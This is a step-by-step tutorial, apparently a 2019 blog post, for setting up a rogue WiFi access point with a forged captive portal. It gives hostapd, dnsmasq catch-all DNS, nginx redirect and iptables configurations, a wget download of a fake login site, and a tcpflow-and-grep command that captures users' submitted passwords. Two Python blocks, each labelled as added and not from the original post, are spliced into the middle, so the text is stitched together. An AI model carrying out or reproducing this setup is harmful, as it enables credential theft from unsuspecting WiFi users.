Captive Portal Guide: Setup Your Fake Access Point

by hash3liZer, 12 January 2019


It often happens that when you connect to a WiFi network, you get a notification or a splash screen telling you to do something before you can use the WiFi. Usually you will see a login screen. That screen is called a Captive Portal.

So, what is it? A Captive Portal is a small functional web page, usually triggered through DNS spoofing and server redirection rules that trick the OS. If the trick succeeds, the OS opens the Captive Portal login page.

Let's see how we can setup a Captive Portal Login Page.

So, how does a captive portal work? It works through DNS hijacking or server redirection rules. Every OS has its own way of detecting a captive portal, but most of them look for 302 redirection responses. Let's study each of their responses.

Windows:

Windows has its own, somewhat obscure way of detecting a captive portal. Usually it requests one of two sites:

www.msftconnecttest.com
www.msftncsi.com

Android:

Android checks the returned response code. For example, if the returned response is 302, the OS assumes there is a captive portal and triggers it. Usually it requests one of the following:

clients3.google.com
connectivitycheck.gstatic.com
connectivitycheck.android.com

Apple:

Unlike Android and Windows, when an Apple device sends a request to the site, the site checks for a specific header that reveals the nature of the requesting device. Apple requests URLs such as:

www.appleiphonecell.com
captive.apple.com
www.apple.com
.apple.com.edgekey.net

From iOS 7 onward, Apple uses a specific User-Agent for captive portal requests, CaptiveNetworkSupport, which can be used to identify Apple devices.
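The three detection schemes above can be modelled as one small client-side check, which is also what a defender runs on joining an unfamiliar network to see whether the connectivity-check hostnames are being diverted. The following is an added example, not code from the original post: it emulates the OS decision offline on constructed DNS answers and HTTP responses. The probe hostnames are the ones listed above; the "clean" answers each probe expects (HTTP 204 for Android's generate_204, a body containing "Success" for Apple's hotspot-detect.html, the text "Microsoft NCSI" for Windows' ncsi.txt) are standard values added here and not stated on the page, and the 203.0.113.x addresses are documentation-range placeholders.

```python
"""Offline emulation of the connectivity check an OS runs to decide whether it
is behind a captive portal, plus a check for the DNS-diversion symptom.

Added example, not code from the original post. Expected probe answers are
standard values assumed here; all DNS answers and HTTP responses are
constructed inline so the script runs without network access.
"""
import ipaddress
from dataclasses import dataclass, field

# hostname -> (platform, expected status, text the body must contain)
PROBES = {
    "connectivitycheck.gstatic.com": ("android", 204, ""),
    "clients3.google.com":           ("android", 204, ""),
    "captive.apple.com":             ("apple",   200, "Success"),
    "www.msftncsi.com":              ("windows", 200, "Microsoft NCSI"),
}

REDIRECTS = {301, 302, 303, 307, 308}

# Address ranges a public probe hostname should never resolve to.
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
               "127.0.0.0/8", "169.254.0.0/16")]


@dataclass
class ProbeResult:
    """What the client saw for one probe: DNS answer plus HTTP response."""
    host: str
    resolved_ip: str
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


def classify(result: ProbeResult) -> str:
    """Mimic the OS decision: 'open', 'captive', or 'unknown' for non-probe hosts."""
    if result.host not in PROBES:
        return "unknown"
    _platform, want_status, want_body = PROBES[result.host]
    # A redirect is the classic signal (the 302 described in the post).
    if result.status in REDIRECTS:
        return "captive"
    # Any other deviation from the canned answer also counts as interception.
    if result.status != want_status or want_body not in result.body:
        return "captive"
    return "open"


def dns_diverted(result: ProbeResult) -> bool:
    """True when a public probe hostname was answered with a private,
    loopback or link-local address, i.e. DNS on this network rewrites it."""
    ip = ipaddress.ip_address(result.resolved_ip)
    return any(ip in net for net in LOCAL_NETS)


def assess(results):
    """Summarise a batch of probe results observed on one network."""
    verdicts = {r.host: classify(r) for r in results}
    diverted = sorted(r.host for r in results
                      if r.host in PROBES and dns_diverted(r))
    return {
        "captive": any(v == "captive" for v in verdicts.values()),
        "dns_diverted": diverted,
        "verdicts": verdicts,
    }


# Constructed sample: what a client observes on the network described in this
# post (every name resolves to the gateway, the web server answers 302).
ON_ROGUE_AP = [
    ProbeResult("connectivitycheck.gstatic.com", "192.168.1.1", 302,
                {"Location": "http://192.168.1.1/index.html"}, ""),
    ProbeResult("captive.apple.com", "192.168.1.1", 302,
                {"Location": "http://192.168.1.1/index.html"}, ""),
    ProbeResult("www.msftncsi.com", "192.168.1.1", 302,
                {"Location": "http://192.168.1.1/index.html"}, ""),
]

# Constructed sample of a normal network (203.0.113.x are placeholders).
ON_NORMAL_NET = [
    ProbeResult("connectivitycheck.gstatic.com", "203.0.113.10", 204),
    ProbeResult("captive.apple.com", "203.0.113.11", 200, {},
                "<HTML><HEAD><TITLE>Success</TITLE></HEAD><BODY>Success</BODY></HTML>"),
    ProbeResult("www.msftncsi.com", "203.0.113.12", 200, {}, "Microsoft NCSI"),
]

if __name__ == "__main__":
    for label, batch in (("rogue AP", ON_ROGUE_AP), ("normal", ON_NORMAL_NET)):
        print(label, assess(batch))
```

The `dns_diverted` check is deliberately separate from `classify`: a legitimate hotspot also answers 302 to these probes, but a public connectivity-check hostname resolving to an RFC 1918 address is the specific fingerprint of the DNS rewriting this guide relies on.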

Let's see how to set up the Captive Portal. We will be using hostapd for the access point configuration, dnsmasq as the DHCP server, and nginx as our web server and for the redirection rules.

STEP 1

Installation

To achieve our objective, we will perform the steps one by one. Update your repositories and install nginx and the other required tools:

$ apt update
$ apt install hostapd dnsmasq nginx

Then put your wireless interface in monitor mode:

$ airmon-ng start wlan1

STEP 2

Rogue Access Point

We are about to use hostapd to host our Access Point, this time with a small amendment. There is also a guide for hosting an access point with roguehostapd, which in fact makes the task easier by replacing the full configuration file with a few arguments.

Create and save the hostapd configuration for Access Point:

$ nano /tmp/hostapd.conf
interface=wlan1mon
driver=nl80211
ssid=[Fake AP Name]
hw_mode=g
channel=[Fake AP Channel]
macaddr_acl=0
ignore_broadcast_ssid=0

Start hostapd service:

$ hostapd /tmp/hostapd.conf

STEP 3

DHCP Server

Now we need a DHCP server to set up a small network and provide the connecting users with IP addresses. We will use dnsmasq for that purpose. Create and save a new configuration file for dnsmasq:

$ nano /tmp/dnsmasq.conf
interface=wlan1mon
address=/#/192.168.1.1
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

In the configuration above we used the address field. It redirects every hostname to the single IP address given, which in our case is the gateway address where our forged website resides:

address=/#/192.168.1.1

If you only want to redirect a few sites, you will have to define each site explicitly, between slashes, followed by the IP address it should resolve to. This approach is used when you intend to provide internet access to the users. For example:

address=/facebook.com/192.168.1.1
address=/google.com/192.168.1.1
address=/youtube.com/192.168.1.1

But we don't want that here, because we want to redirect as much as possible: we don't know which site a user is going to request, so why not redirect all of them?

Start dnsmasq service:

$ dnsmasq -C /tmp/dnsmasq.conf -d

Finally, execute these two commands to assign the gateway IP and netmask to your interface:

$ ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0
$ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

STEP 4

Captive Portal

Here the actual work starts. Create a new directory to hold your website and move into it. I would name it captive_portal.

$ mkdir /var/www/captive_portal
$ cd /var/www/captive_portal

Now download the Rogue AP website and extract the files into this directory:

$ wget https://www.shellvoide.com/media/files/rogueap.zip
$ unzip rogueap.zip -d ./

Now you should have the files placed under your captive_portal directory. All we need now is to set up the nginx configuration for our captive portal project. First, remove the enabled sites from the nginx configuration directory:

$ rm /etc/nginx/sites-enabled/*

Now create a new configuration file for your captive portal project, place the following directives in it, and save the file:

$ nano /etc/nginx/sites-enabled/captive_portal
server {
    listen 80;
    root /var/www/captive_portal;

    location / {
        if (!-f $request_filename){
            return 302 $scheme://192.168.1.1/index.html;
        }
    }
}

What is happening in the nginx configuration is that whenever the user requests a file that doesn't exist, the request is redirected to our fake page at 192.168.1.1, which is exactly what we are trying to accomplish. Note that this redirection of non-existent files is the most important part. The root directive specifies the directory where the website is placed. Finally, reload the nginx service:

$ service nginx reload
$ service nginx restart

Check that nginx is running and serving our fake page:

$ service nginx status

STEP 5

Capture Password

Now that we have a working access point along with a forged page, we need a way to capture the password credentials. Previously, we used a MySQL database to store the data. However, there's an even better approach: sniff the network and capture what is posted. Open a terminal and execute this command:

$ sudo tcpflow -i any -C -g port 80 | grep -i "password1="

What is happening is that we capture the whole network traffic on every interface and pipe it to grep, which looks for specific lines. I've set this up according to what will be POSTed when a user enters a password and presses Enter on the Captive Portal login page. The data will be printed on screen when it is entered on the forged website.

STEP 6

Internet Forwarding (Optional)

The last step is to provide our users with internet access. Achieving this, however, is a bit tricky. What we would need to do is change or drop the catch-all address field in the dnsmasq configuration. But if we do, the Captive Portal will no longer work. So, what to do?

To overcome this complication, i.e. to provide internet access while still serving the Captive Portal, the address field must be explicitly defined for a set of given sites. For example, to only redirect Android-based devices, the address field would be:

address=/clients3.google.com/192.168.1.1

The same can be applied to other websites as well. There are several sites that must be correctly redirected for this to work. I don't know all of them, but some of the well-known and widely implemented ones can be configured:

interface=wlan1mon
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

address=/clients3.google.com/192.168.1.1
address=/gsp1.apple.com/192.168.1.1
address=/.akamaitechnologies.com/192.168.1.1
address=/www.appleiphonecell.com/192.168.1.1
address=/www.airport.us/192.168.1.1
address=/.apple.com.edgekey.net/192.168.1.1
address=/.akamaiedge.net/192.168.1.1
address=/captive.apple.com/192.168.1.1
address=/ipv6.msftncsi.com/192.168.1.1
address=/www.msftncsi.com/192.168.1.1

Then restart dnsmasq with this configuration.
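The difference between the catch-all `address=/#/` line from STEP 3 and the per-site list above comes down to how dnsmasq matches the address directive. The following is an added example, not code from the original post and not dnsmasq's own code: a small model of that matching, run against copies of both configurations from this post so you can see which of the connectivity-check hostnames listed earlier each one answers itself and which it forwards upstream. It assumes the rules from the dnsmasq manual (an entry matches that name and every name below it, `#` matches everything, and the most specific matching entry wins) and treats a leading dot on an entry such as `.akamaiedge.net` as the same suffix match, which is an assumption on my part. A hotspot operator can use the same check to confirm a legitimate portal will be noticed by client devices.

```python
"""Model of dnsmasq's address= matching, applied to the two configurations
shown in this post.

Added example, not code from the original post and not dnsmasq's own code.
Assumed matching rules: an entry matches the name and all names below it,
'#' matches everything, the longest matching entry wins, and a leading dot
on an entry is ignored. Config texts are copies of the ones in the post.
"""

# Abbreviated copy of the STEP 3 configuration (catch-all redirect).
CATCH_ALL_CONF = """\
interface=wlan1mon
address=/#/192.168.1.1
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
server=8.8.8.8
"""

# Copy of the STEP 6 configuration (selective redirect).
SELECTIVE_CONF = """\
interface=wlan1mon
server=8.8.8.8
address=/clients3.google.com/192.168.1.1
address=/gsp1.apple.com/192.168.1.1
address=/.akamaitechnologies.com/192.168.1.1
address=/www.appleiphonecell.com/192.168.1.1
address=/www.airport.us/192.168.1.1
address=/.apple.com.edgekey.net/192.168.1.1
address=/.akamaiedge.net/192.168.1.1
address=/captive.apple.com/192.168.1.1
address=/ipv6.msftncsi.com/192.168.1.1
address=/www.msftncsi.com/192.168.1.1
"""

# Connectivity-check hostnames listed earlier in the post.
PROBE_HOSTS = [
    "www.msftconnecttest.com", "www.msftncsi.com",
    "clients3.google.com", "connectivitycheck.gstatic.com",
    "connectivitycheck.android.com",
    "www.appleiphonecell.com", "captive.apple.com", "www.apple.com",
]


def parse_address_rules(config_text):
    """Return [(domain, ip), ...] from every address=/d1/d2/.../ip line."""
    rules = []
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line.startswith("address=/"):
            continue
        parts = line[len("address="):].split("/")
        # "/d1/d2/ip".split("/") -> ["", "d1", "d2", "ip"]
        ip = parts[-1]
        for domain in parts[1:-1]:
            # Assumption: a leading dot means the same suffix match.
            rules.append((domain.lstrip(".").lower().rstrip("."), ip))
    return rules


def resolve(rules, hostname):
    """IP dnsmasq would answer for hostname, or None when the query is
    forwarded to the upstream server= entry instead."""
    name = hostname.lower().rstrip(".")
    best = None  # (specificity, ip)
    for domain, ip in rules:
        if domain == "#":
            specificity = 0
        elif name == domain or name.endswith("." + domain):
            specificity = len(domain)
        else:
            continue
        if best is None or specificity > best[0]:
            best = (specificity, ip)
    return best[1] if best else None


def diverted_probes(config_text, hosts=PROBE_HOSTS):
    """Map each probe hostname to the address the config would answer with."""
    rules = parse_address_rules(config_text)
    return {h: resolve(rules, h) for h in hosts}


if __name__ == "__main__":
    for label, conf in (("catch-all", CATCH_ALL_CONF), ("selective", SELECTIVE_CONF)):
        print(label)
        for host, ip in diverted_probes(conf).items():
            print(f"  {host:32} -> {ip or 'forwarded upstream'}")
```

Running it shows why the catch-all line needs no knowledge of the probe hostnames while the selective list only diverts the names it spells out (or their subdomains, such as hosts under akamaiedge.net); everything else goes to the server= upstream, which is what restores internet access in STEP 6.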

Finally, we need another interface which has an internet connection; the traffic from this interface will be forwarded to the access point interface. I have this interface named wlan0, from where I will redirect traffic to wlan1mon. Execute the following commands with your respective interfaces:

$ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
$ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

Now, just one step to go...

$ echo 1 > /proc/sys/net/ipv4/ip_forward

It's all set up. Pick up your mobile, connect to the Rogue Access Point and see for yourself. If you enter a password in the fields and press Enter, the captured data will be printed in the tcpflow terminal.

Conclusion

The conclusion that can be drawn from all of the above is that users can easily be tricked into performing unexpected tasks when it comes to WiFi. With the help of a captive portal login, the overall performance and interactivity of the Access Point increases and the attack surface widens. Above all, the working of a captive portal rests merely on the principle of redirection.